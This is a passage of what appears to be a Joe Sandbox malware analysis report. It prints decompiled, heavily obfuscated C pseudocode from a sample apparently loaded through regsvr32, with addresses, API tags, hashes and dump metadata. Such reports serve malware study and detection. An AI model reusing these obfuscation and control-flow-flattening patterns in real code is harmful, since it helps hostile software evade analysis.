				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				signed int _t307;
				intOrPtr _t314;
				void* _t316;
				intOrPtr _t319;
				void* _t320;
				char _t329;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				void* _t357;

				_v532 = 0x14aa91;
				_t319 = 0;
				_t320 = 0xadf9a9e;
				_v528 = 0;
				_v584 = 0x7d2a17;
				_v584 = _v584 * 0x32;
				_v584 = _v584 ^ 0x1872387f;
				_v592 = 0xb13dc6;
				_v592 = _v592 + 0xffffae74;
				_v592 = _v592 ^ 0x00b0ed3a;
				_v608 = 0xc455f0;
				_v608 = _v608 << 7;
				_v608 = _v608 ^ 0x622af803;
				_v596 = 0xc1aeae;
				_t351 = 0x54;
				_v596 = _v596 * 0x16;
				_v596 = _v596 ^ 0x10a502f4;
				_v588 = 0xc20331;
				_v588 = _v588 + 0xf5c5;
				_v588 = _v588 ^ 0x00c2f8f6;
				_v668 = 0x6f5aa3;
				_v668 = _v668 << 1;
				_v668 = _v668 + 0xffff66fc;
				_v668 = _v668 >> 0xd;
				_v668 = _v668 ^ 0x000f80fa;
				_v700 = 0x1f8f6e;
				_v700 = _v700 >> 2;
				_v700 = _v700 * 0x58;
				_v700 = _v700 >> 0xa;
				_v700 = _v700 ^ 0x000dbb0c;
				_v696 = 0x5d9849;
				_v696 = _v696 << 0xa;
				_v696 = _v696 << 2;
				_v696 = _v696 >> 6;
				_v696 = _v696 ^ 0x0364a765;
				_v704 = 0x1bc8a3;
				_v704 = _v704 + 0xffff8b7f;
				_v704 = _v704 * 0x4d;
				_v704 = _v704 << 0xa;
				_v704 = _v704 ^ 0xe13c000b;
				_v652 = 0x14f5b4;
				_v652 = _v652 + 0xffff3a15;
				_v652 = _v652 >> 6;
				_v652 = _v652 ^ 0x000b8006;
				_v684 = 0x6cb15;
				_v684 = _v684 + 0xffff4699;
				_v684 = _v684 + 0x33ea;
				_v684 = _v684 ^ 0xd2c6947d;
				_v684 = _v684 ^ 0xd2c43d39;
				_v656 = 0x3d1e0f;
				_v656 = _v656 << 4;
				_v656 = _v656 + 0xb674;
				_v656 = _v656 ^ 0x03dc9375;
				_v640 = 0xc9bf54;
				_v640 = _v640 + 0x4c85;
				_v640 = _v640 ^ 0xcb79285f;
				_v640 = _v640 ^ 0xcbb49c3b;
				_v680 = 0x4705cc;
				_v680 = _v680 ^ 0x021c34d3;
				_v680 = _v680 >> 0xa;
				_v680 = _v680 | 0xadb3f107;
				_v680 = _v680 ^ 0xadbdacc8;
				_v688 = 0x32b940;
				_t352 = 0x6f;
				_v688 = _v688 / _t351;
				_v688 = _v688 ^ 0xda450382;
				_v688 = _v688 / _t352;
				_v688 = _v688 ^ 0x01f184f1;
				_v632 = 0xb9e843;
				_v632 = _v632 + 0x7ee7;
				_v632 = _v632 >> 0x10;
				_v632 = _v632 ^ 0x000a2f3b;
				_v620 = 0xa4061a;
				_t353 = 0x63;
				_v620 = _v620 * 0x4a;
				_v620 = _v620 ^ 0x2f6c9848;
				_v612 = 0x8d5c52;
				_v612 = _v612 | 0xe4bf6a48;
				_v612 = _v612 ^ 0xe4b3a9a5;
				_v600 = 0x4c0602;
				_v600 = _v600 * 7;
				_v600 = _v600 ^ 0x02116849;
				_v624 = 0x79642d;
				_v624 = _v624 >> 6;
				_v624 = _v624 ^ 0x0006f47a;
				_v616 = 0xa5b4e4;
				_v616 = _v616 | 0x1bbcf141;
				_v616 = _v616 ^ 0x1bbfbc00;
				_v672 = 0xd8c65e;
				_v672 = _v672 | 0xbc1b56d9;
				_v672 = _v672 * 0x6f;
				_v672 = _v672 ^ 0x4f656148;
				_v672 = _v672 ^ 0xac3cb569;
				_v660 = 0x6a5e0f;
				_v660 = _v660 >> 0xc;
				_v660 = _v660 << 0xe;
				_v660 = _v660 ^ 0x01aa48cc;
				_v604 = 0x3105ef;
				_v604 = _v604 + 0xffffcb4e;
				_v604 = _v604 ^ 0x00361807;
				_v648 = 0xcaa497;
				_v648 = _v648 / _t353;
				_t354 = 0x2c;
				_v648 = _v648 / _t354;
				_v648 = _v648 ^ 0x0003a50e;
				_v676 = 0xb7633b;
				_v676 = _v676 * 0x28;
				_v676 = _v676 | 0x6fe8e629;
				_v676 = _v676 ^ 0x870c55dc;
				_v676 = _v676 ^ 0xf8eec52d;
				_v644 = 0xd5188b;
				_v644 = _v644 + 0x6eb5;
				_v644 = _v644 + 0xffff53fe;
				_v644 = _v644 ^ 0x00d2bd3d;
				_v692 = 0x8e661b;
				_v692 = _v692 * 0x21;
				_v692 = _v692 ^ 0xcb3a52dc;
				_v692 = _v692 + 0xffffab8c;
				_v692 = _v692 ^ 0xd965e9c1;
				_v628 = 0x4bef65;
				_t214 =  &_v628; // 0x4bef65
				_v628 =  *_t214 * 0x7a;
				_v628 = _v628 + 0xffff6d83;
				_v628 = _v628 ^ 0x242fe0e6;
				_v636 = 0x28cff7;
				_v636 = _v636 * 0x60;
				_v636 = _v636 >> 0x10;
				_v636 = _v636 ^ 0x000c0449;
				_v664 = 0x77d782;
				_v664 = _v664 | 0x76669dfc;
				_v664 = _v664 * 0x7b;
				_v664 = _v664 + 0xffff7a99;
				_v664 = _v664 ^ 0xeb93eb33;
				_t350 = _v624;
				do {
					while(_t320 != 0xcea1d3) {
						if(_t320 == 0x342421a) {
							_push(_v684);
							_push(_v652);
							_push(_v704);
							E1001734A(_v656, __eflags, _v640, _v680, _v688,  &_v524, E10004BB4(0x10001200, _v696), _v632, 0x10001200,  *0x10024208);
							E1000B9D7(_v620, _v612, _t308, _v600);
							_t357 = _t357 + 0x34;
							_t320 = 0xcea1d3;
							continue;
						} else {
							if(_t320 == 0x368326a) {
								E1001E373(_v628, _t350, _v636, _v664); // executed
							} else {
								if(_t320 == 0x540b720) {
									_t329 = _v580;
									_t314 = _v576;
									_push(_t329);
									_v568 = _t314;
									_v560 = _t314;
									_v552 = _t314;
									_v544 = _t314;
									_v572 = _t329;
									_v564 = _t329;
									_v556 = _t329;
									_v548 = _t329;
									_v540 = _v588;
									_t316 = E1000F1D5(_t350,  &_v572, _v648, _v676, _t329, _v644, _v692); // executed
									_t357 = _t357 + 0x18;
									__eflags = _t316;
									_t319 =  !=  ? 1 : _t319;
									_t320 = 0x368326a;
									continue;
								} else {
									if(_t320 == 0x6f6e569) {
										E100118F7( &_v580, _v668, _v700);
										_t320 = 0xa3fbe1e;
										continue;
									} else {
										if(_t320 == 0xa3fbe1e) {
											_v580 = _v580 - E1001EA4F();
											_t320 = 0x342421a;
											asm("sbb [esp+0x94], edx");
											continue;
										} else {
											if(_t320 != 0xadf9a9e) {
												goto L16;
											} else {
												_t320 = 0x6f6e569;
												continue;
											}
										}
									}
								}
							}
						}
						L19:
						return _t319;
					}
					_t307 = E1001BF1C(_v624, _v608, _v616, _v672, _v584, _v660,  &_v524, _v596, _t320, _t320, _v592, _v604); // executed
					_t350 = _t307;
					_t357 = _t357 + 0x28;
					__eflags = _t350 - 0xffffffff;
					if(_t350 == 0xffffffff) {
						_t320 = 0x86ba6b1;
						goto L16;
					} else {
						_t320 = 0x540b720;
						continue;
					}
					goto L19;
					L16:
					__eflags = _t320 - 0x86ba6b1;
				} while (_t320 != 0x86ba6b1);
				goto L19;
			}

0x1000be0f
0x1000be1d
0x1000be1f
0x1000be24
0x1000be2b
0x1000be43
0x1000be4a
0x1000be55
0x1000be60
0x1000be6b
0x1000be76
0x1000be7e
0x1000be83
0x1000be8b
0x1000be9e
0x1000bea1
0x1000bea8
0x1000beb3
0x1000bebe
0x1000bec9
0x1000bed4
0x1000bedc
0x1000bee0
0x1000bee8
0x1000beed
0x1000bef5
0x1000befd
0x1000bf07
0x1000bf0b
0x1000bf10
0x1000bf18
0x1000bf20
0x1000bf25
0x1000bf2a
0x1000bf2f
0x1000bf37
0x1000bf3f
0x1000bf4c
0x1000bf50
0x1000bf55
0x1000bf5d
0x1000bf65
0x1000bf6d
0x1000bf72
0x1000bf7a
0x1000bf82
0x1000bf8a
0x1000bf92
0x1000bf9a
0x1000bfa2
0x1000bfaa
0x1000bfaf
0x1000bfb7
0x1000bfbf
0x1000bfc7
0x1000bfcf
0x1000bfd7
0x1000bfdf
0x1000bfe7
0x1000bfef
0x1000bff4
0x1000bffc
0x1000c004
0x1000c012
0x1000c013
0x1000c017
0x1000c029
0x1000c02f
0x1000c037
0x1000c03f
0x1000c047
0x1000c04c
0x1000c054
0x1000c061
0x1000c064
0x1000c068
0x1000c070
0x1000c078
0x1000c080
0x1000c088
0x1000c09b
0x1000c0a2
0x1000c0ad
0x1000c0b5
0x1000c0ba
0x1000c0c2
0x1000c0ca
0x1000c0d2
0x1000c0da
0x1000c0e2
0x1000c0ef
0x1000c0f3
0x1000c0fb
0x1000c103
0x1000c10b
0x1000c110
0x1000c115
0x1000c11d
0x1000c125
0x1000c12d
0x1000c135
0x1000c145
0x1000c14d
0x1000c150
0x1000c154
0x1000c15c
0x1000c169
0x1000c16d
0x1000c175
0x1000c17d
0x1000c185
0x1000c18d
0x1000c195
0x1000c19d
0x1000c1a5
0x1000c1b2
0x1000c1b6
0x1000c1be
0x1000c1c6
0x1000c1ce
0x1000c1d6
0x1000c1db
0x1000c1df
0x1000c1e7
0x1000c1ef
0x1000c1fc
0x1000c200
0x1000c205
0x1000c20d
0x1000c215
0x1000c222
0x1000c226
0x1000c233
0x1000c23b
0x1000c23f
0x1000c23f
0x1000c251
0x1000c34c
0x1000c355
0x1000c359
0x1000c39b
0x1000c3b6
0x1000c3bb
0x1000c3be
0x00000000
0x1000c257
0x1000c25d
0x1000c43f
0x1000c263
0x1000c265
0x1000c2c3
0x1000c2d1
0x1000c2d8
0x1000c2d9
0x1000c2e0
0x1000c2e7
0x1000c2ee
0x1000c300
0x1000c30b
0x1000c317
0x1000c322
0x1000c32b
0x1000c332
0x1000c339
0x1000c33d
0x1000c33f
0x1000c342
0x00000000
0x1000c267
0x1000c26d
0x1000c2b3
0x1000c2b9
0x00000000
0x1000c26f
0x1000c275
0x1000c28f
0x1000c296
0x1000c29b
0x00000000
0x1000c277
0x1000c27d
0x00000000
0x1000c283
0x1000c283
0x00000000
0x1000c283
0x1000c27d
0x1000c275
0x1000c26d
0x1000c265
0x1000c25d
0x1000c449
0x1000c452
0x1000c452
0x1000c408
0x1000c40d
0x1000c40f
0x1000c412
0x1000c415
0x1000c41e
0x00000000
0x1000c417
0x1000c417
0x00000000
0x1000c417
0x00000000
0x1000c423
0x1000c423
0x1000c423
0x00000000

Strings

3, xrefs: 1000BF8A
eK, xrefs: 1000C1D6
)o, xrefs: 1000C16D
-dy, xrefs: 1000C0AD
HaeO, xrefs: 1000C0F3

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: )o$-dy$HaeO$eK$3
API String ID: 2962429428-603960384
Opcode ID: 219c479b6cdad4c0663aa90921e5e77e582ffcc987bfed4dd877e3d7e63693dc
Instruction ID: 42c97338f0d9611e4486f5e0f1d2218e25e199b980727b2178473d3a0bb2f323
Opcode Fuzzy Hash: 219c479b6cdad4c0663aa90921e5e77e582ffcc987bfed4dd877e3d7e63693dc
Instruction Fuzzy Hash: E2E10F714083819FD3A8CF65D48AA4FBBE1FBC4388F608A1DF59A86260D7B58549CF06

Uniqueness

Uniqueness Score: -1.00%

Function 1002110E Relevance: 6.4, Strings: 5, Instructions: 182
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E1002110E(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				short _v108;
				char* _v112;
				char* _v116;
				signed int _v120;
				char _v124;
				char _v644;
				char _v1164;
				void* _t196;
				signed int _t231;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t196);
				_v84 = _v84 & 0x00000000;
				_v80 = _v80 & 0x00000000;
				_v92 = 0x987a9b;
				_v88 = 0xa72cf7;
				_v32 = 0x5f808e;
				_t235 = 0x5a;
				_v32 = _v32 / _t235;
				_v32 = _v32 << 0xd;
				_v32 = _v32 ^ 0x21f4c001;
				_v40 = 0x2f472a;
				_t236 = 0x2d;
				_v40 = _v40 * 0x15;
				_v40 = _v40 ^ 0x2041aa7c;
				_v40 = _v40 ^ 0x23a17a1a;
				_v60 = 0x9b82a6;
				_v60 = _v60 + 0xba96;
				_v60 = _v60 ^ 0x009c353c;
				_v68 = 0x45dada;
				_v68 = _v68 + 0xffff912b;
				_v68 = _v68 ^ 0x0048dcbd;
				_v64 = 0x2b8aad;
				_v64 = _v64 + 0xffff01f2;
				_v64 = _v64 ^ 0x00276123;
				_v12 = 0xa7f403;
				_v12 = _v12 ^ 0x91109655;
				_v12 = _v12 + 0xffff08c1;
				_v12 = _v12 / _t236;
				_v12 = _v12 ^ 0x03377d0e;
				_v8 = 0xe24a76;
				_t237 = 0x34;
				_v8 = _v8 / _t237;
				_v8 = _v8 + 0x3db5;
				_v8 = _v8 | 0x09f6ffcb;
				_v8 = _v8 ^ 0x09f11af0;
				_v20 = 0x111f60;
				_v20 = _v20 + 0xf1bb;
				_v20 = _v20 | 0x817c037c;
				_v20 = _v20 ^ 0xf4b0f388;
				_v20 = _v20 ^ 0x75c18f63;
				_v52 = 0x72276e;
				_v52 = _v52 | 0x0e31ff81;
				_v52 = _v52 ^ 0x0e70baf1;
				_v48 = 0x1a7381;
				_v48 = _v48 + 0x5930;
				_v48 = _v48 << 1;
				_v48 = _v48 ^ 0x003ce1d6;
				_v76 = 0xc20e8f;
				_v76 = _v76 << 5;
				_v76 = _v76 ^ 0x18435533;
				_v16 = 0xde43ab;
				_v16 = _v16 << 0xa;
				_t238 = 0x3d;
				_v16 = _v16 / _t238;
				_v16 = _v16 | 0xa047b04d;
				_v16 = _v16 ^ 0xa1fb1e7d;
				_v36 = 0xffaec4;
				_t239 = 5;
				_v36 = _v36 / _t239;
				_t240 = 0x5e;
				_v36 = _v36 * 0x52;
				_v36 = _v36 ^ 0x10669444;
				_v72 = 0x8eeaec;
				_v72 = _v72 | 0xb04bb448;
				_v72 = _v72 ^ 0xb0c634cd;
				_v56 = 0x5585f3;
				_t241 = 0x6f;
				_v56 = _v56 / _t240;
				_v56 = _v56 ^ 0x000303b0;
				_v44 = 0xbc50a3;
				_v44 = _v44 + 0xdc76;
				_v44 = _v44 / _t241;
				_v44 = _v44 ^ 0x0007cd88;
				_v28 = 0x726e6a;
				_t242 = 0xb;
				_v28 = _v28 * 0x56;
				_v28 = _v28 + 0xecbe;
				_v28 = _v28 ^ 0x267fd9dd;
				_v24 = 0x7d3410;
				_v24 = _v24 | 0x3be14af2;
				_v24 = _v24 / _t242;
				_v24 = _v24 + 0x4202;
				_v24 = _v24 ^ 0x057f548c;
				E1000B184( &_v124, _v68, 0x1e, _v64, _v12);
				E1000B184( &_v644, _v8, 0x208, _v20, _v52);
				E1000B184( &_v1164, _v48, 0x208, _v76, _v16);
				E100207BB(_v36, _a12,  &_v644, _v72);
				E100207BB(_v56, _a8,  &_v1164, _v44);
				_v120 = _v32;
				_v116 =  &_v644;
				_v112 =  &_v1164;
				_v108 = _v60 | _v40 | 0x00000410;
				_t231 = E1000338B(_v28, _v24,  &_v124); // executed
				asm("sbb eax, eax");
				return  ~_t231 + 1;
			}

0x10021118
0x1002111b
0x1002111e
0x10021121
0x10021122
0x10021123
0x10021128
0x1002112e
0x10021132
0x10021139
0x10021140
0x1002114c
0x10021151
0x10021156
0x1002115a
0x10021161
0x1002116c
0x1002116f
0x10021172
0x10021179
0x10021180
0x10021187
0x1002118e
0x10021195
0x1002119c
0x100211a3
0x100211aa
0x100211b1
0x100211b8
0x100211bf
0x100211c6
0x100211cd
0x100211db
0x100211de
0x100211e5
0x100211ef
0x100211f4
0x100211f9
0x10021200
0x10021207
0x1002120e
0x10021215
0x1002121c
0x10021223
0x1002122a
0x10021231
0x10021238
0x1002123f
0x10021246
0x1002124d
0x10021254
0x10021257
0x1002125e
0x10021265
0x10021269
0x10021270
0x10021277
0x1002127e
0x10021281
0x10021284
0x1002128b
0x10021292
0x1002129e
0x100212a5
0x100212ae
0x100212b1
0x100212b4
0x100212bb
0x100212c2
0x100212c9
0x100212d0
0x100212dc
0x100212dd
0x100212e2
0x100212e9
0x100212f0
0x100212fe
0x10021303
0x1002130a
0x10021315
0x10021316
0x10021319
0x10021320
0x10021327
0x1002132e
0x1002133d
0x10021340
0x10021347
0x10021359
0x10021373
0x10021388
0x1002139d
0x100213b5
0x100213bd
0x100213c6
0x100213cf
0x100213e3
0x100213eb
0x100213f5
0x100213fc

Strings

vJ, xrefs: 100211E5
jnr, xrefs: 1002130A
*G/, xrefs: 10021161
#a', xrefs: 100211B8
n'r, xrefs: 10021231

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID: #a'$*G/$jnr$n'r$vJ
API String ID: 3080627654-2039441710
Opcode ID: 8394bdcfe05464de37ef81cf5fc6a51d4b7212829df7ae24e33a0b89c761c6e8
Instruction ID: 752b88743b4da2a1b6d56f19123ddaad6eeccb8df0ea4f48aabc3775a36e6215
Opcode Fuzzy Hash: 8394bdcfe05464de37ef81cf5fc6a51d4b7212829df7ae24e33a0b89c761c6e8
Instruction Fuzzy Hash: 76910275D0020DEBDF18CFA4D98A9DEBBB2FF04314F208159E511B6250DBB55A46CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1000E1A9 Relevance: 5.1, Strings: 4, Instructions: 63
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1000E1A9() {
				unsigned int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _t86;
				signed int _t87;

				_v20 = 0x713f6e;
				_v20 = _v20 + 0x39c2;
				_v20 = _v20 | 0x94d34aee;
				_v20 = _v20 + 0xffff3dc8;
				_v20 = _v20 ^ 0x94f2b9c6;
				_v24 = 0x183e5a;
				_t86 = 0x2f;
				_v24 = _v24 * 0x50;
				_v24 = _v24 / _t86;
				_v24 = _v24 ^ 0x002854e6;
				_v32 = 0xed702a;
				_v32 = _v32 ^ 0xf23f01dc;
				_v32 = _v32 ^ 0xf2d991b6;
				_v16 = 0xf86932;
				_t87 = 0x2a;
				_v16 = _v16 * 0x49;
				_v16 = _v16 * 0x62;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0xedd2944a;
				_v12 = 0x5ecd97;
				_v12 = _v12 * 0x2f;
				_v12 = _v12 + 0x5274;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x022d51f2;
				_v28 = 0xed13a5;
				_v28 = _v28 / _t87;
				_v28 = _v28 | 0xf3e573a0;
				_v28 = _v28 ^ 0xf3ee1c73;
				_v8 = 0x8e6a40;
				_v8 = _v8 >> 1;
				_v8 = _v8 + 0xffffc547;
				_v8 = _v8 + 0xd691;
				_v8 = _v8 ^ 0x0045d87b;
				E10011FD0();
				E1000BA9C(_t87, _t87, _v20); // executed
				return _v16;
			}

0x1000e1af
0x1000e1b8
0x1000e1bf
0x1000e1c6
0x1000e1cd
0x1000e1d4
0x1000e1e1
0x1000e1e4
0x1000e1ee
0x1000e1f1
0x1000e1f8
0x1000e1ff
0x1000e206
0x1000e20d
0x1000e218
0x1000e219
0x1000e220
0x1000e223
0x1000e227
0x1000e22e
0x1000e239
0x1000e23c
0x1000e243
0x1000e247
0x1000e24e
0x1000e25a
0x1000e25d
0x1000e264
0x1000e26b
0x1000e272
0x1000e275
0x1000e27c
0x1000e283
0x1000e290
0x1000e2a6
0x1000e2b1

Strings

n?q, xrefs: 1000E1AF
T(, xrefs: 1000E1F1
tR, xrefs: 1000E23C
*p, xrefs: 1000E1F8

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: *p$n?q$tR$T(
API String ID: 621844428-3899743595
Opcode ID: 1941713d0b0b26a8c9bfafdf87911617413e31cc19013a56d6a446fb4d9f7d5b
Instruction ID: a23e8fc0875705eceb6d24a185ee078627b1d67f6f7e4139df7dc776329e2dc3
Opcode Fuzzy Hash: 1941713d0b0b26a8c9bfafdf87911617413e31cc19013a56d6a446fb4d9f7d5b
Instruction Fuzzy Hash: 1E31E1B4D0130AEBCB48DFE5C64A4AEFBB0FF40314F209199D561BA250E3B85B468F91

Uniqueness

Uniqueness Score: -1.00%

Function 100066B0 Relevance: 2.7, Strings: 2, Instructions: 210
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E100066B0() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				signed int _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _t190;
				void* _t194;
				signed int _t196;
				signed int _t198;
				void* _t201;
				intOrPtr _t203;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t222;
				signed int _t224;
				void* _t225;
				void* _t227;
				signed int* _t232;

				_t232 =  &_v668;
				_v580 = 0xb00850;
				_v576 = 0x61a432;
				_t203 = 0;
				_t225 = 0x3ec95c2;
				_v572 = 0;
				_v568 = 0;
				_v664 = 0x2f5bb9;
				_v664 = _v664 << 0xb;
				_v664 = _v664 + 0x48ad;
				_v664 = _v664 >> 7;
				_v664 = _v664 ^ 0x00f5bca1;
				_v624 = 0xefbff8;
				_t205 = 0x71;
				_v624 = _v624 / _t205;
				_v624 = _v624 ^ 0x00021f27;
				_v636 = 0x581715;
				_v636 = _v636 + 0xa31a;
				_t206 = 0x6d;
				_v636 = _v636 / _t206;
				_v636 = _v636 ^ 0x0000d060;
				_v644 = 0x3d39a;
				_t207 = 0x56;
				_v644 = _v644 / _t207;
				_v644 = _v644 + 0xffffa3f9;
				_v644 = _v644 ^ 0xffffaf5d;
				_v660 = 0xa3f0a7;
				_v660 = _v660 ^ 0x34a5f594;
				_t208 = 0x6b;
				_v660 = _v660 / _t208;
				_v660 = _v660 ^ 0xa7a55145;
				_v660 = _v660 ^ 0xa7dc7073;
				_v612 = 0xdb969e;
				_v612 = _v612 << 0xe;
				_v612 = _v612 ^ 0xe5a9cabd;
				_v640 = 0x9ac35f;
				_t209 = 0x1e;
				_v640 = _v640 * 0x1c;
				_v640 = _v640 << 0xe;
				_v640 = _v640 ^ 0x579be950;
				_v628 = 0x6237d1;
				_t190 = _v628;
				_t222 = _t190 % _t209;
				_v628 = _t190 / _t209;
				_v628 = _v628 | 0x31bcff6b;
				_v628 = _v628 ^ 0x31b12a39;
				_v656 = 0xa612c7;
				_v656 = _v656 + 0x152e;
				_v656 = _v656 + 0x2409;
				_v656 = _v656 >> 5;
				_v656 = _v656 ^ 0x00011039;
				_v648 = 0x86fa2c;
				_v648 = _v648 | 0xbffdc7bf;
				_v648 = _v648 ^ 0xbff61fb1;
				_v632 = 0xf86ee1;
				_v632 = _v632 + 0xffffae0f;
				_v632 = _v632 * 0x59;
				_v632 = _v632 ^ 0x564003aa;
				_v616 = 0x14d14c;
				_v616 = _v616 << 0xf;
				_v616 = _v616 ^ 0x68a8fff1;
				_v652 = 0x3089ba;
				_v652 = _v652 + 0xffff3983;
				_v652 = _v652 >> 7;
				_v652 = _v652 ^ 0x000dfac1;
				_v604 = 0x746761;
				_v604 = _v604 | 0x09020f50;
				_v604 = _v604 ^ 0x09786851;
				_v600 = 0x68ac95;
				_t224 = _v624;
				_v600 = _v600 * 0x45;
				_v600 = _v600 ^ 0x1c351c4c;
				_v596 = 0xfd6c73;
				_v596 = _v596 >> 5;
				_v596 = _v596 ^ 0x00050e56;
				_v668 = 0xa3c05b;
				_v668 = _v668 << 3;
				_v668 = _v668 >> 7;
				_v668 = _v668 + 0xa7d4;
				_v668 = _v668 ^ 0x000e8fb2;
				_v592 = 0x994f84;
				_v592 = _v592 + 0xffffdad1;
				_v592 = _v592 ^ 0x009d6a19;
				_v608 = 0x707dd1;
				_v608 = _v608 | 0xa8a7d054;
				_v608 = _v608 ^ 0xa8fe482d;
				_v620 = 0xe765dd;
				_v620 = _v620 << 5;
				_v620 = _v620 ^ 0x1cec45ba;
				do {
					while(_t225 != 0x20f8037) {
						if(_t225 == 0x3457107) {
							_t222 = _v636;
							_t196 = E1001BF1C(_v628, _t222, _v656, _v648, _v624, _v632,  &_v524, _v644, _v628, _v628, _v664, _v616); // executed
							_t224 = _t196;
							_t232 =  &(_t232[0xa]);
							__eflags = _t224 - 0xffffffff;
							if(_t224 != 0xffffffff) {
								_t225 = 0x7b87f47;
								continue;
							}
						} else {
							if(_t225 == 0x3ec95c2) {
								_t225 = 0xa873945;
								continue;
							} else {
								if(_t225 == 0x7b87f47) {
									_t198 = E1001BA34( &_v564, _v652, _v604, _t224, _t209, _v600);
									_t232 =  &(_t232[5]);
									_t222 = _t224;
									asm("sbb esi, esi");
									_t225 = ( ~_t198 & 0x040c053d) + 0x683ac72; // executed
									E1001E373(_v596, _t222, _v668, _v592); // executed
									_pop(_t209);
									goto L19;
								} else {
									if(_t225 == 0xa873945) {
										_t222 = _v660;
										_t201 = E10009574(_t222,  &_v524, _v612, _v640);
										_t232 =  &(_t232[3]);
										__eflags = _t201;
										if(_t201 != 0) {
											_t225 = 0x3457107;
											continue;
										}
									} else {
										if(_t225 != 0xa8fb1af) {
											goto L19;
										} else {
											_t222 = _v608;
											E100118F7( &_v588, _t222, _v620);
											_pop(_t209);
											_t225 = 0x20f8037;
											continue;
										}
									}
								}
							}
						}
						goto L20;
					}
					_t194 = E1001EA4F();
					_t227 = _v588 - _v548;
					_t209 = _v584;
					asm("sbb ecx, [esp+0x8c]");
					__eflags = _v584 - _t222;
					if(__eflags >= 0) {
						if(__eflags > 0) {
							L17:
							_t203 = 1;
							__eflags = 1;
						} else {
							__eflags = _t227 - _t194;
							if(_t227 >= _t194) {
								goto L17;
							}
						}
					}
					_t225 = 0x683ac72;
					L19:
					__eflags = _t225 - 0x683ac72;
				} while (_t225 != 0x683ac72);
				L20:
				return _t203;
			}

0x100066b0
0x100066b6
0x100066c0
0x100066cb
0x100066cd
0x100066d2
0x100066d6
0x100066da
0x100066e2
0x100066e7
0x100066ef
0x100066f4
0x100066fc
0x1000670b
0x10006710
0x10006716
0x1000671e
0x10006726
0x10006732
0x10006737
0x1000673d
0x10006745
0x10006751
0x10006756
0x1000675c
0x10006764
0x1000676c
0x10006774
0x10006780
0x10006785
0x1000678b
0x10006793
0x1000679b
0x100067a3
0x100067a8
0x100067b0
0x100067bd
0x100067be
0x100067c2
0x100067c7
0x100067cf
0x100067d7
0x100067db
0x100067dd
0x100067e1
0x100067e9
0x100067f1
0x100067f9
0x10006801
0x10006809
0x1000680e
0x10006816
0x1000681e
0x10006826
0x1000682e
0x10006836
0x10006843
0x10006847
0x1000684f
0x1000685c
0x10006861
0x10006869
0x10006871
0x10006879
0x1000687e
0x10006886
0x1000688e
0x10006896
0x1000689e
0x100068ab
0x100068af
0x100068b3
0x100068bb
0x100068c3
0x100068c8
0x100068d0
0x100068d8
0x100068dd
0x100068e2
0x100068ea
0x100068f2
0x100068fa
0x10006902
0x1000690a
0x10006912
0x1000691a
0x10006922
0x1000692a
0x1000692f
0x10006937
0x10006937
0x10006949
0x10006a2d
0x10006a35
0x10006a3a
0x10006a3c
0x10006a3f
0x10006a42
0x10006a44
0x00000000
0x10006a44
0x1000694f
0x10006955
0x100069fd
0x00000000
0x1000695b
0x10006961
0x100069d0
0x100069d5
0x100069dc
0x100069de
0x100069f2
0x100069f4
0x100069fa
0x00000000
0x10006963
0x10006969
0x1000699f
0x100069a4
0x100069a9
0x100069ac
